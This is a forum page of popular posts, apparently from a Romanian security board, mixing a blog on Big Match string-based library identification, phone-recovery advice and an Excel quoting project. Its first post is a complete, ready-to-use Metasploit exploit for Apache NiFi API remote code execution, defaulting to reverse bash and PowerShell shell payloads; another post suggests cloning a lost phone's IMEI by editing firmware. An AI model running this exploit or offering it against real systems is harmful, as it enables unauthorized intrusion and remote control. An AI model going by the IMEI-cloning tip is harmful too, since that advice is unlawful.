Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 12/01/20 in all areas

  1. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # Potential Improvements: # Add option to authenticate using client certificate # Add a scanner module? class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info( info, 'Name' => 'Apache NiFi API Remote Code Execution', 'Description' => ' This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor processor is created then is configured with the payload and started. The processor is then stopped and deleted.', 'License' => MSF_LICENSE, 'Author' => ['Graeme Robinson'], 'References' => [ ['URL', 'https://nifi.apache.org/'], ['URL', 'https://github.com/apache/nifi'], ['URL', 'https://nifi.apache.org/docs/nifi-docs/components/org.apache.nifi/nifi-standard-nar/1.12.1/' \ 'org.apache.nifi.processors.standard.ExecuteProcess/index.html'] ], 'DisclosureDate' => 'Oct 3 2020', 'DefaultOptions' => { 'RPORT' => 8080 }, 'Platform' => %w[unix linux macos win], 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix (In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'BadChars' => '"' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } ], [ 'Windows (In-Memory)', 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :win_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } ] ], 'Privileged' => false, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] } )) register_options( [ OptString.new('TARGETURI', [true, 'The base path', '/nifi-api']), OptString.new('USERNAME', [false, 'Username to authenticate with']), OptString.new('PASSWORD', [false, 'Password to authenticate with']), OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']), OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 5]) # 2 seems enough in my lab, but set to 5 for safety ], self.class ) end def check_response(description, response, expected_response_code, item = '') # Check that response was received fail_with(Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response # Check that response code was expected if response.code != expected_response_code fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from API when #{description} " \ "(received #{response.code}, expected #{expected_response_code})") end # Check that item can be retrieved return if item.empty? body = response.get_json_document unless body.key?(item) fail_with(Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}") end body[item] end def supports_login response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') }) config = check_response('GETting access configuration', response, 200, 'config') config['supportsLogin'] end def fetch_process_group opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response('GETting root process group', response, 200, 'id') end def create_processor(process_group) body = { 'component' => { 'type' => 'org.apache.nifi.processors.standard.ExecuteProcess' }, 'revision' => { 'version' => 0 } } opts = { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'), 'ctype' => 'application/json', 'data' => body.to_json } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response("POSTing new processor in process group #{process_group}", response, 201, 'id') end def configure_processor(command) cmd = command.split(' ', 2) body = { 'component' => { 'config' => { 'autoTerminatedRelationships' => ['success'], 'properties' => { 'Command' => cmd[0], 'Command Arguments' => cmd[1] }, 'schedulingPeriod' => '3600 sec' }, 'id' => @processor, 'state' => 'RUNNING' }, 'revision' => { 'clientId' => 'x', 'version' => 1 } } opts = { 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, 'processors', @processor), 'ctype' => 'application/json', 'data' => body.to_json } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response("PUTting processor #{@processor} configuration", response, 200) end def stop_processor # Attempt to stop process body = { 'revision' => { 'clientId' => 'x', 'version' => 1 }, 'state' => 'STOPPED' } opts = { 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'run-status'), 'ctype' => 'application/json', 'data' => body.to_json } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response("PUTting processor #{@processor} stop command", response, 200) # Stop may not have worked (but must be done first). Terminate threads now opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', @processor, 'threads') } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response("DELETEing processor #{@processor} terminate threads command", response, 200) end def delete_processor opts = { 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'processors', @processor), 'vars_get' => { 'version' => 3 } } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token response = send_request_cgi(opts) check_response("DELETEting processor #{@processor}", response, 200) end def check # As far as I can tell from the API documentation, it's not possible to check whether the required permissions are # present unless "permission to check permissions" is granted. For this reason it reports: # * "Unknown" if a timeout is experienced when checking whether login is required # * "Safe" if the response to the login check is not one of the two expected responses because it's probably not # NiFi # * "Detected" if login is required, because it has confirmed that NiFi is running on the port becuase it got an # expected response # * "Appears" if login is not required because it has confirmed that Nifi is running because it got the expected # response and if there is no authentication then there is no way of restricting the ExecuteCode permimssion @cleanup_required = false response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'access', 'config') }) if !response CheckCode::Unknown else body = response.get_json_document if !body.key?('config') CheckCode::Safe elsif body['config']['supportsLogin'] CheckCode::Detected else CheckCode::Appears end end end def validate_config return if datastore['BEARER-TOKEN'].to_s.empty? || datastore['USERNAME'].to_s.empty? fail_with(Failure::BadConfig, 'Specify EITHER Bearer-Token OR Username') end def retrieve_token response = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'access', 'token'), 'vars_post' => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] } } ) check_response('POSTing credentials', response, 201) response.body end def cleanup return unless @cleanup_required # Wait for thread to execute - This seems necesarry, especially on Windows # and there is no way I can see of checking whether the thread has executed print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting") sleep(datastore['DELAY']) # Stop Processor stop_processor vprint_good("Stopped and terminated processor #{@processor}") # Delete processor delete_processor vprint_good("Deleted processor #{@processor}") end def exploit validate_config # Check whether login is required and set/fetch token if supports_login if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty? fail_with(Failure::BadConfig, 'Authentication is required. Bearer-Token or Username and Password must be specified') end @token = if datastore['BEARER-TOKEN'].to_s.empty? retrieve_token else datastore['BEARER-TOKEN'] end else @token = false end # Retrieve root process group process_group = fetch_process_group vprint_good("Retrieved process group: #{process_group}") @cleanup_required = true # Create processor in root process group @processor = create_processor(process_group) vprint_good("Created processor #{@processor} in process group #{process_group}") # Generate command case target['Type'] when :unix_memory cmd = "bash -c \"#{payload.encoded}\"" when :win_memory # This is a bit hacky because double quotes are processed and removed by the NiFi ExecuteCommand processor. See # below for why BadChars didn't cut it. The solution used is to wrap up command in a cmd /C "payload" command and # use powershell's Stop-parsing token (--%) to remove the need to perform any escaping of metacharacter. This # command is then base64 encoded and run with -e/-EncodedCommand. This allows commands including double quotes and # dollar signs (etc.) to be passed to cmd.exe # # This method was chosen rather than using # BadChars => '"' # with # cmd /C "#{payload.encoded}" # because commands such as # echo x^"x >%tmp%\x # did not work with the BadChars method ("^" is the cmd.exe escape char) enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE')) cmd = "powershell.exe -e #{enc_cmd}" end vprint_status("Using command #{cmd}") # Configure processor and run command configure_processor(cmd) vprint_good("Configured processor #{@processor} and ran command") end end # 0day.today [2020-12-01] # Source
    1 point
  2. Today we are proud of showing the world the first prototype of Big Match, our tool to find open-source libraries in binaries only using their strings. How does it work? Read this post to find out, or head to our demo website to try it out. Spoiler: we are analyzing all the repositories on GitHub and building a search engine on top of that data. Introduction There's a thing that every good reverser does when starting to work on a target: look for interesting strings and throw them into Google hoping to find some open-source or leaked source. This can save you anywhere from few hours of work to several days. It's kind of a poor man's function (or library) matching. In 2018, I decided to try out LINE's Bug Bounty program and so I started reversing a library bundled with the Android version of the App. For those unfamiliar with LINE, it's the most used instant messaging App in Japan. Anyway, there were many useful error strings sprinkled all around my target, so I did exactly that manual googling I've just mentioned. Luckily, I was able to match some strings against Cisco's libsrtp. But little did I know, my target included a modified version of PJSIP, a huge library that does indeed include libsrtp. Unfortunately, I discovered this fact much later, so I wasted an entire week reversing an open-source library. Outline of our approach The way we, at rev.ng, decided to approach this problem is actually simple conceptually, but gets tricky due to the scale of the data we are dealing with. In short, this is the outline of what we did: Get the source code of the top C/C++ repositories on GitHub, where "top" means "most starred". Ideally we would like to analyze all of them, and we will eventually, but we wanted to give priority to famous projects. Deduplicate the repositories: we don't want to have 70k+ slightly different versions of the Linux kernel in our database. Extract the strings: use ripgrep as a quick way to extract strings from source code. De-escape the strings. E.g.: turn '\n' into an actual newline character. Hash the strings. Store them in some kind of database. Query the database using the hashes of the strings from a target binary. Cluster the query results. Where to start The first thing we did was figure out a way to get the list of all the repos on GitHub, sorted by stars. It turns out, however, that this is more easily said than done. GitHub has an official API but it is rate-limited and we wanted to avoid writing a multi-machine crawling system just for that. So we looked around and, among many projects making available GitHub data, we found the amazing GHTorrent. GHTorrent, short for GitHub Torrent, is a project created by Prof. Georgios Gousios of TU Delft. What it does is periodically poll GitHub's public events API and use the information on commits and new repositories to record the history of GitHub. So, for example, if user thebabush pushes some changes to his repository awesome-repo, GHTorrent analyzes those changes and, if the repo is not present in its database, it creates a new entry. It also saves its metadata, e.g. star count, and some of its commits. By exploiting the GitHub REST API, GHTorrent is able to create a somewhat complete relational view of all of GitHub (except for the actual source code): GHTorrent's data is made available as either a MySQL dump of the relational database in the picture or as a series of daily MongoDB dumps. GHTorrent uses Mongo as a caching layer for GitHub's API so that it can avoid making the same API call twice. Once you import the GHTorrent MySQL dumps on your machine, you can quickly get useful information about GitHub using good ol' SQL (e.g.: information about the most popular C/C++ repos is a simple SELECT ... WHERE ... ORDER BY ...). It also contains information about forks and commits, so you have some good data to exploit for the repo deduplication we want to do. However, GHTorrent is best-effort by design, so you'll never have a complete and consistent snapshot of GitHub. For example, some repos might be missing or have outdated metadata. Another example is that commits information is partial: GHTorrent cannot possibly associate every commit to every repository containing it. Think about the Linux kernel: one commit would need to be added to 70k+ forks and that kind of things doesn't scale very well. Finally, there's another risk regarding the use of a project like GHTorrent: maintenance. Keeping a crawler working costs money and time, and it seems like in the last couple of years they haven't been releasing MySQL dumps that often anymore. On the other hand, they still release their incremental Mongo updates daily. Since they create the MySQL DB using REST API calls that are cached through MongoDB, those incremental updates should be everything you need to recreate their MySQL database. A fun fact is that Microsoft used to sponsor GHTorrent, but I guess they don't need to do it now. And yes, that's not a good thing for us. In the end, since we don't actually need all the tables provided by the GHTorrent MySQL dump, we decided to write a script that directly consumes their Mongo dumps one by one and outputs the information we need into a bunch of text files. In fact, most of our pipeline is implemented using bash scripts (you can read more in our future blogpost about what we like to call bashML). Repository deduplication We mentioned in the outline that we need to deduplicate the repositories. We need to do that for several reasons: As stated earlier, we don't want to download every single fork of every single famous project out there. Duplicated data means that our database of repos grows very fast in size. The first ~100K repos we downloaded from GitHub amount to ~1.4TB of gzip'd source code (without git history), so you can see why this is an important point. Duplicated data is bad for search results accuracy. GHTorrent has information about forks but, as for GitHub itself, that only counts forks created with the "Fork" button on the web UI. The other option is to look for common commits between repositories. If we had infinite computing resources, we would do this: Clone every repository we care about. Put every commit hash in a graph database of some kind. Connect commit hashes using their parent/child relationship. Find the root commits. For every root commit, keep only the most-starred repo. However, we live in the real world, so this is simply impossible for us to do. We would like to have a strategy to deduplicate repos before cloning them, as cloning would require a lot of time and bandwidth. On top of that, when using git you can merge the history of totally-unrelated projects. So, if you deduplicate repos based on the root commit alone, you end up removing a lot of projects you actually want to keep. Case in point: octocat/Spoon-Knife. octocat/Spoon-Knife is the most forked project on GitHub, and there's a reason for that: it's the repo that is used in GitHub's tutorial on forking. This means that a lot of people learning to use GitHub have forked this repo at some point. You might be wondering why Spoon-Knife causes troubles to our theoretical deduplication algorithm. Well, take a look at this screenshot of LibreCAD's git history: At some point in the past some user by the name of youarefunny was learning to use GitHub and so he forked Spoon-Knife. At some other point, he forked LibreCAD and made some commits. Then, for whatever reason, he thought "well, why not merge the history of these two nice repositories in a single one? So we can have a branch with the history of both projects!". And finally, just to fuck with us contribute to a useful open-source project like LibreCAD, he decided to open a pull request using that exact branch. And that pull request was accepted. TL;DR: the history of Spoon-Knife is included in LibreCAD's repo. If you want to check this out, visit this link or clone LibreCAD/LibreCAD and run git diff f08a37f282dd30ce7cb759d6cf8981c982290170. Things like this present a serious issue for us because Spoon-Knife has 10.3k stars at the moment, while LibreCAD only has 2k. Which means that if we were to remove the least starred project, we would actually remove LibreCAD and keep the utterly useless Spoon-Knife repo. I hate you yourefunny. And no, you are not actually funny. But yourefunny is not alone in this: during our tests we've found that some people also like to merge the history of Linux and LLVM. Go figure. Best-effort deduplication So we can't git clone every repo on GitHub and we can't do root-based deduplication. What we can do is use GHTorrent once again and implement a different strategy. In fact, GHTorrent has information about commits, too, albeit limited. This is what it gives us: (partial) (parent commit, child commit) relations. (partial) (commit, repository) relations. Exploiting this data we can't reconstruct the full git history of every repository, but we can recreate subgraphs of it. We then apply this algorithm: Find a commit for which GHTorrent doesn't have a parent (we call them parentless commits) and consider it a root commit. Explore the commit history graph starting at a root commit. We do this going upward, that is, only following parent → child edges. We group all the repositories associated with the commits of a subgraph we obtain in step 2. We call such group a repository group. For every repository group, we find the most starred repo it contains and consider it the parent repo, while we consider the others the children repos. We now have several (parent repo, child repo) relations. We do all the previous steps for all the commits data in GHTorrent and obtain a huge graph of repositories related by has_parent relations. We take all the repositories without parents and consider them unique repos. In other words, we will not crawl repos for which we have a parent. This is easier shown than explained, so let's start with the following example git history graph: We have 5 commits (A, B, C, D and E), related by is_parent relations, and for each commit we have data on which repos contain them. We have 2 root commits, A and E, and for each of them we perform step 2 and 3 to create their repository groups: You can see that we get groups Group 1 and Group 2. We then take every group, together with the star counts of its repos, and create a partial repository graph. For example, if we take Group 2 from above, we get this: repo4 is the repo with the most stars in Group 2, so we assume that the other repos in the group are forked from it. By joining all the partial repository graphs we extract from all the groups we've found, we get the full repository graph: We can now take the repositories without a parent and consider them as deduplicated repos. In other words, we will only crawl the repositories marked in red in the picture. This is pretty much how we try to deduplicate repositories prior to cloning them. Now, before you write us angry comments: we know this is not perfect, but it works and is a good trade-off between deduplicating too much and not deduplicating at all. From source code to string hashes After crawling the repos resulting from the previous step, we need to analyze their C/C++ files to extract the strings inside them. Parsing C/C++ files is non-trivial due to macros, include files, and all those C magic goodies. In this first iteration of Big Match we wanted to be fast and favoured a simple approach: using grep (actually, ripgrep). So yeah, we just grep for single-line string literals and store them in a txt file. Then, we take every string from the file and de-escape it so special characters like '\n' are converted to the real ascii character they represent. We do this because, of course, once strings pass through the compiler and end up in the final binary, they are not escaped anymore, so we try to emulate that process. Finally, we hash the strings and store the hex-coded hashes, again, in a txt file. This is nice because we end up with 3 files per repo: A tarball with its source code. A txt file with its strings. A txt file with its hashes (<repo_name>.hashes.txt) If you are wondering why we like txt files so much, be sure to read the next section. Polishing the data As said above, our repository analysis pipeline leaves us with many <repo_name>.hashes.txt files containing all the hex-coded hashes of the strings in a repository. It's now time to turn those files into something that we can use to build a search engine. Search engine 101 A lot of modern search engines include some kind of vector space model. This is a fancy way to say that they represent a document as a vector of words. For example: txt_0 = "hello world my name is babush" txt_1 = "good morning babush" # once encoded, it becomes: doc_0 = [ 1, # hello 1, # world 1, # my 1, # name 1, # is 1, # babush 0, # good 0, # morning ] doc_1 = [ 0, # hello 0, # world 0, # my 0, # name 0, # is 1, # babush 1, # good 1, # morning ] There are many flavours of vector space models, but the main point is that instead of just using a boolean value for the words, one can use word counts or some weighting scheme like tf-idf (more on this later). What does the vector space model have to do with Big Match? Just swap repositories for documents and string hashes for words and you've got a model for building a repository search engine. And, instead of querying using a sequence of words, you just use a vector of string hashes like they were a new repository. In our case, we decided not to count the number of times a string is present in a repository, so we just need to put a 1 if a string is present in a repo and then apply some weighting formula to tell the model that some strings are more important than others. Now, how do you turn a bunch of txt files into a set of vectors? Enter bashML. You will read about it in another article on our blog, but the main point is that we can do everything using just bash scripts by piping coreutils programs. A picture is worth a million words, so enjoy this visualization of a part of our bash pipeline (created with our internal tool pipedream😞 Algorithms and parameter estimation The next step was to evaluate the best algorithms for weighting the strings in our repos/vectors. For this, we created an artificial dataset using strings on libraries we compiled ourselves (thanks Gentoo). Without going into the details, it turns out that tf-idf weighting and simple cosine similarity work very well for our problem. For those of you unfamiliar with these terms: Tf-idf is a very common weighting scheme that considers both the popularity of the words in a document (in our case, string hashes in a repo) and the size of the documents (in our case, repositories). In tf-idf, popular words are penalized because it is assumed that common words convey less information than rare ones. Similarly, short documents are considered more informative than long documents, as the latters tend to match more often just because they contain more words. Cosine similarity, also very common, is one of the many metrics one can use to calculate the distance between vectors. Specifically, it measures the angle between a pair of N-dimensional vectors: a similarity next to 1 means a small angle, while a value close to 0 means the vectors are orthogonal. Long story short: scoring boils down to calculating the cosine distance between a given repo and the set of hashes in input (both weighted using tf-idf). We also wanted to study whether removing the top-K most common strings could improve the results of a query. Our intuition was that very frequent strings like "error" aren't very useful in disambiguating repositories. In fact, removing the most common strings did improve our results: cutting around K = 10k seemed to give the best score. After some plotting around, we increased our confidence in that magic number: Note: both axes use a logarithmic scale. You can easily see that the first ~10k most frequent strings (on the left of the red line) are very popular, then there's a somewhat flat area, and finally an area of infrequent strings on the right. The graph, together with our tests, confirms that keeping the strings that are too popular actually makes the query results worse. At this point, due to the big number of near-duplicates still present in our database, the repo similarity scores looked like this: $ strings /path/to/target | ./query.sh 0.95 repoA 0.94 repoA-fork1 0.92 repoA-fork2 0.91 repoA-fork3 ... 0.60 repoB 0.59 repoB-fork1 0.57 repoB-fork3 0.52 library-with-repoB-sourcecode-inside ... This is a huge problem because it means that if we just show the top-K repositories that have the highest similarity to our query, they are mostly different versions of the same repo. If there are two repos inside our binary, for example zlib and libssl, one of the two would be buried deep down in the results due to the many zlib or libssl versions out there. On top of that, developers often just copy zlib or libssl source code in their repos to have all dependencies ready on clone. For these reasons we wanted to cluster the search results. We once again used our artificial Gentoo dataset, plus some manual result evaluation, and ended up choosing spectral co-clustering as our clustering algorithm. We also plotted the clustered results and they looked pretty pretty nice: On the x-axis you have the strings that match our example query while on the y-axis you have the repositories matching at least one string hash. A red pixel means that the repo y contains string x. The blue lines are just to mark the different repository clusters. Due to the nature of spectral co-clustering, the more the plot looks like a block diagonal matrix, the better the clustering results are. It's interesting to note that strings plus clustering are good enough to visually identify similar repositories. One might also be able to use strings to guess if a repository is wholly contained into a bigger one (once again, think of something like zlib inside the repo of an image compression program). Putting it into production Putting everything we have shown into a working search engine is just a matter of loading all the repo vectors into a huge (sparse) matrix and wait for a query vector from the user. By query vector we mean that, once the user gives us a set of strings to search in Big Match, we encode them in a vector using the encoding scheme we've shown earlier. Since we use tf-idf and normalize properly, a matrix multiplication is all we need to score every repository against the query: where After that we just need to use the scores to find the best-matching repositories, cluster them using their rows in the big matrix, and show everything to the user. But don't take our word for it, try our amazing web demo. A second deduplication step When we tried out our pipeline for the first time, the average amount of RAM required to store a repo vector was around 40kB. That's not too much, but we plan to have most of GitHub C/C++ repos in memory so we wanted to decrease it even more. Since we use a sparse matrix, memory consumption is proportional to the number of elements we store, where an element is stored iff . In order to get a better insight into our initial dataset, we plotted the top-10k repos with the most strings to look at their string distribution: The average string count, 23k, is shown in red in the picture. We also marked in green the position of a repository with ~23k strings, which is basically the repo with average string count. It follows that if we sum everything on the left of the green line we get (almost) the same number that we get if we sum everything on the right. In other words, the area under the blue curve (in the complete, uncropped plot) is divided evenly by the green line. If we keep in mind that at this point the dataset was made out of ~60k repositories, this means that the top-5k biggest repos occupied as much RAM as the remaining ~55k repos. By looking at the plot we are able to say that if we are able to better deduplicate the most expensive (memory-wise) repositories we should be able to lower the average amount of memory-per-repository by quite a bit. In case you are wondering what those projects are, they are mostly Android or plain Linux kernels that are dumped on GitHub as a single commit, so they bypass our first deduplication pass. Since at this point we have the source code of every repository that passed through the first deduplication phase, we can apply a second, more expensive, content-aware deduplication to try to improve the situation. For this, we wrote a bash script that computes the Jaccard similarity of the biggest repositories in our dataset and, given two very similar projects, only keeps the most-starred one. By using this method we are able to succesfully deduplicate a lot of big repositories and decrease RAM usage significantly. Pros and cons Time to talk about the good and the bad of this first iteration of Big Match. Pros: Perfect string-matching works surprisingly well. Privacy: if a hash doesn't match, we don't know what string it represents. Cons: We get relevant results only for binaries with a decent amount of strings. At the moment, we only do perfect matching: in the future we want to support partial matches Query speed is good enough but we need to make it faster as we scale up our database. Using strings is sub-optimal: a proper decompiler-driven string extraction algorithm would be able to exploit, for example, pointers in the binary to better understand where strings actually start (strings is limited to very simple heuristics). So, instead of picking up strings with wrong prefixes like "XRWFHello World", we would be able to extract the actual string "Hello World". Conclusion Gone are the days of me reversers wasting weeks reversing open source libraries embedded in their targets. Ok, maybe not yet, but we made a big step towards that goal and, while quite happy with the results of Big Match v1, we are already planning for the next iteration of the project. First of all, we want to integrate Big Match with our decompiler. Then, we want to add partial strings matching and introduce support for magic numbers/arrays (think well-known constants like file format headers or cryptographic constants). We also want to test whether strings and constants can be reliably used to guess the exact version of a library embedded in a binary (if you have access to a library's git history, you can search for the commit that results in the best string matches). In the mean time, we need to battle-test Big Match's engine and scale the size of our database so that we can provide more value to the users. Finally, it would be interesting to add to our database strings taken directly from binaries for which there are no sources available (e.g.: firmware, malware, etc...). One again, if you haven't done it already, go check out our Big Match demo and tell us what you think. Until then, babush Source
    1 point
  3. Singura metoda si cu o rugaciune sa se miste repede e sa te duci la politie cu actul doveditor de achizitie daca l-ai cumparat din magazina si chiar si la mana a 2 a daca l-ai cumparat si poate ti-a data ala acte pe el gen factura bon... etc in orice caz daca l-ai pierdut sau ti-a fost furat la politie indiferent de situatie spui ca ti-a fost furat doar asa te ia in seama si iti ia si plangerea si in rest este doar nevoie de rabdare / timp si sa te rogi ca respectivul care la gasit sau ti la furat sa nu il scape din mana sa til crape dureaza pana la 3 luni pana o sa primesti un semn de la politie :). Atentie: trebuie sa ai un act doveditor ca e al tau dispozitivul. P.S. era frumos ca androidu cel putin chiar si dupa reset sa iti ramana logat in contul google in aplicatia Administrare dispozitiv ceva pe hide si sa il poti scoate din "urmarire" doar daca il vinzi tu mai departe cu buna stiinta... pe degeaba ii bagi programe softuri de urmarire in caz de furt ca la reset sau resoftare sa incheie povestea...
    1 point
  4. Daca deja a plecat: Dupa adresa de MAC a placilor de retea orice adresa de MAC a device-urilor ramane in logurile gateway-urilor dar cum nu ai acces la punctele de acces sau la servere nu se poate. Varianta SF: Scrie un alt telefon cu IMEI-ul si celellalte date ale telefonului pierdut, editeaza firmware-ul, pune o cartela tot pe aceasi retea si asteapta pana cand intr-o zi va inchide samsungul si atunci intrii cu al tau editat firmware pe retea iar al lui nu va mai merge, probabi lcel care la cumparat se va duce la operatorul de retea. Legal: se poate identifica dupa IMEI la operatorul de retea cu mandat daca ai noroc.
    1 point
  5. Incerc sa explic cat mai bine prin poze. 1. La munca ma ocup cu ofertare si devize pentru izolarea caselor. Ca sa-mi usurez munca am facut eu un "program" in excel de calcul si generare de devize, oferte si contracte. Interfata: In partea de materiale si servicii am materialele si serviciile folosite la o lucrare. Ele se regasesc in Tabul "preturi" si in interfata le aleg cu dropdown (avand mai multe tipuri de folie, band etc. cu diferite preturi). Cum procedez sa aflu un pret pentru o lucrare: - aleg materialele si serviciile aferente acelei lucrari, densitatea, grosimea pe care se face izolatia, suprafata de izolat, manopera, deplasare, numar de muncitori, zile, % pierdere folie, banda, am niste reguli si pt capse, petece, banda de imbinare (cat se consuma pe mp). Dupa ce introduc toate aceste date am rezultatele de mai jos: - nr de saci necesari pentru lucrare(cantitatea in kg / 15 kg cat are un sac), mc material, pret in lei si in euro (folosesc cursul bnr care se actualizeaza singur cand deschid fisierul), profit, cheltuieli, impozit etc... In partea de jos am - Oferta - Deviz, unde introduc datele manual necesare pentru generarea devizului si a contractului, nume, prenume, email etc.. Asa arata un deviz: care se completeaza automat in functie de ce este in interfata. Exista si un buton cu macro cand il apasam imi salva devizul ca pdf (prefer manual). Contractul in completez prin mail merge cu datele colectate pret, mp, adresa, avans, total, etc...(deschid wordul cu templateul de contract si se completeaza cu datele din tabul MailMerge.). Mai este tabul txt in care am partea asta de pe deviz cu etapele de executie (in functie de ce materiale si servicii aleg acel text se schimba) - poza 3. Tabul Txt: Ca sa explic mai bine trebuie exact pe fisier. 1.1. Interfata web Am incercat sa fac ceva eu cu un prieten cu Laravel dar ma depaseste. Ceva de genul vreau cu o baza de date pentru materiale si preturi. Tipurile de materiale care sunt 15 20 maxim. Si datele pentru devizele generate sa le salvez intr-o baza de date cu un search ca sa-mi fie usor sa identific o lucrare cu un pret (sa nu stau sa caut in toate pdf urile cum fac acum). Interfata de unde sa introduc datele si sa generez contact, deviz, oferta etc. In partea dreapta din interfata sa am rezultatele pret, profit, cheltuieli, impozit ... etc Cred ca am reusit sa descriu ce am acum si ce doresc. 2. Despre suma pot sa spun ca am un buget undeva la 100 - 150 euro. Folosim o platforma gen Fiverr .... ca sa raspund la restul de intrebari legate de garantie si plata. Sper ca am reusit sa explic cat de cat ok ce am nevoie. Multumesc @MrGrj pentru ajutor!
    1 point
  6. Hai sa iti explic putin cum sta treaba daca vrei sa gasesti pe cineva: 1. Descrie asa cum trebuie proiectul. 1.1 Ce fel de interfata? Web / Desktop / Command Line? 1.2 Cum arata excel-ul respectiv? Sunt mai multe sheets? E foarte mare fisierul? 1.3 Cum ai vrea sa arate "interfata" respectiva? 1.4 Ce legatura au PDF-ul si WORD-ul cu excelul? 2. Ce suma oferi pentru cele de mai sus? 2.1 Oferi un avans? 2.2 Garantezi ca vei plati developerul care iti va face acest proiect? 2.3 Daca garantezi, cum o faci? 2.4 Cum vei face plata? Daca oferi aceste detalii iti garantez ca se vor gasi oameni care te vor ajuta. Poate chiar si gratis, pentru portofoliu, daca e ceva rapid
    1 point
×
×
  • Create New...